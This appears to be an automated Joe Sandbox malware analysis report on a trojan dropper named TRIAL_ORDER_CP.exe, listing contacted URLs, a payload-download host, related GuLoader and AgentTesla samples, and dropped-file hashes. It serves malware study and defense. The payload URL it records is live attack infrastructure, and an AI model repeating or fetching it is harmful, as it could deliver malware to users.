          https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://youtu.be/1uIizdaJhMIexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according-explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.wyexplorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.pngexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-6explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?$explorer.exe, 00000007.00000000.272432151244.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272794146189.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.0000000009886000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svgexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-darkexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankrexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-texplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/play/games/idle-mining-explorer.exe, 00000007.00000003.272792772276.00000000095B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://word.office.comexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSyb3d8bbwexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-canexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.binTRIAL_ORDER_CP.exe, 00000003.00000002.270971425091.0000000032F40000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv8explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?=explorer.exe, 00000007.00000002.275196926066.000000000D2EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2EF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorTRIAL_ORDER_CP.exefalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.foreca.comexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://outlook.comexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/tv/news/cexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/eexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svgexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AAexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnltsexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://wealthofgeeks.com/the-best-tv-anti-heroes/explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&ocexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/ePexplorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Cleaexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svgexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://excel.office.comSexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSXboxGamewexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGluexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT3explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-namexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-darkexplorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdTRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQexplorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.pngexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8-darkexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/health/yogapilates/biden-admin-can-t-force-electric-vehicle-goals-robert-wexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://sz.zxg6.za.com/.ex/ELFyaa85.binJTRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrCexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com:443/en-us/feedexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://people.com/jim-parsons-reprising-big-bang-theory-role-is-a-gift-exclusive-8647240explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/foodanddrink/foodnews/30-photos-of-super-nostalgic-things-that-ll-bring-baexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/play/games/rally-champion/cg-9pmdcq52j3hjexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyymexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/us/eight-seconds-KDexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
38.242.218.41 | sz.zxg6.za.com | United States | 36336 | NATIXISUS | false
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500398
          Start date and time:2024-08-28 12:22:10 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 17m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:TRIAL_ORDER_CP.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@5/13@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 60%
          • Number of executed functions: 56
          • Number of non-executed functions: 272
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:26:16 | API Interceptor | 11411630x Sleep call for process: Robocopy.exe modified
          No context
          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NATIXISUS | https://ap.gstudio.one/index.php/lists/lw689m5b1xac4/unsubscribe/te8165ggfzbed/dg88530l326d5/unsubscribe-direct | malicious | Unknown | 38.242.226.154
 | jzXBbfutn2.elf | malicious | Unknown | 38.242.104.226
 | 38-drop.elf | malicious | Unknown | 38.242.144.29
 | GF87654456789900..DOC.exe | malicious | Remcos, DBatLoader | 38.242.255.115
 | Enquiry 220062.exe | malicious | Remcos, DBatLoader | 38.242.255.115
 | mhJTEU0jTIDARYr.exe | malicious | AgentTesla | 38.242.240.108
 | 436162.xls | malicious | DBatLoader | 38.242.255.115
 | 2zA63r22hAWM5UI.exe | malicious | AgentTesla, PureLog Stealer | 38.242.240.108
 | nwuV7k6gVrstx33.exe | malicious | AgentTesla, PureLog Stealer | 38.242.240.108
 | z13.exe | malicious | AgentTesla | 38.242.240.108
          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader
 | FedEx Shipping Confirmation.exe | malicious | GuLoader, Snake Keylogger
 | IMG_00991ORDER_FILES.exe | malicious | FormBook, GuLoader
 | FedEx Shipping Confirmation.exe | malicious | GuLoader
 | IMG_00991ORDER_FILES.exe | malicious | GuLoader
 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | malicious | Unknown
C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader
 | FedEx Shipping Confirmation.exe | malicious | GuLoader, Snake Keylogger
 | IMG_00991ORDER_FILES.exe | malicious | FormBook, GuLoader
 | FedEx Shipping Confirmation.exe | malicious | GuLoader
 | IMG_00991ORDER_FILES.exe | malicious | GuLoader
 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | malicious | Unknown
 | AKgHw6grDP.exe | malicious | GuLoader
 | AKgHw6grDP.exe | malicious | GuLoader
 | PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe | malicious | Remcos, GuLoader
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):269664
                                        Entropy (8bit):1.2446463566225683
                                        Encrypted:false
                                        SSDEEP:768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
                                        MD5:084CDF1FE8920EACBC8DC0E839D9E5A7
                                        SHA1:5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
                                        SHA-256:A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
                                        SHA-512:F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
                                        Malicious:false
                                        Reputation:low
                                        Preview:...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............|................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131403
                                        Entropy (8bit):1.2526174536345023
                                        Encrypted:false
                                        SSDEEP:768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
                                        MD5:9AD6681DD2B309E6ACE142096F9E2870
                                        SHA1:5E02434342A98589A29B7E389E88DD4C60F09A8A
                                        SHA-256:576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
                                        SHA-512:28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
                                        Malicious:false
                                        Reputation:low
                                        Preview:.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):407199
                                        Entropy (8bit):1.2437541055056829
                                        Encrypted:false
                                        SSDEEP:1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
                                        MD5:D2D56C0A1BC3F0AE364C30A638393597
                                        SHA1:B564662188D504D42B22E18A487BF35503B87AF5
                                        SHA-256:E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
                                        SHA-512:2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
                                        Malicious:false
                                        Reputation:low
                                        Preview:..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):385015
                                        Entropy (8bit):1.253279247179919
                                        Encrypted:false
                                        SSDEEP:1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
                                        MD5:84182132BEAC6B4CDD42AE3C3504778F
                                        SHA1:9844B9B4ABEAC7B410809A582FE2E41BD38876A3
                                        SHA-256:5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
                                        SHA-512:054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
                                        Malicious:false
                                        Preview:....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):186880
                                        Entropy (8bit):1.2601075629320995
                                        Encrypted:false
                                        SSDEEP:768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
                                        MD5:AA2CD52ABEA96B7E317691ADD713125D
                                        SHA1:B34046DE9D9A275896762FD53A2DFF2D382EAE56
                                        SHA-256:C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
                                        SHA-512:AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
                                        Malicious:false
                                        Preview:..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:ASCII text, with very long lines (304), with no line terminators
                                        Category:dropped
                                        Size (bytes):304
                                        Entropy (8bit):4.14301130689188
                                        Encrypted:false
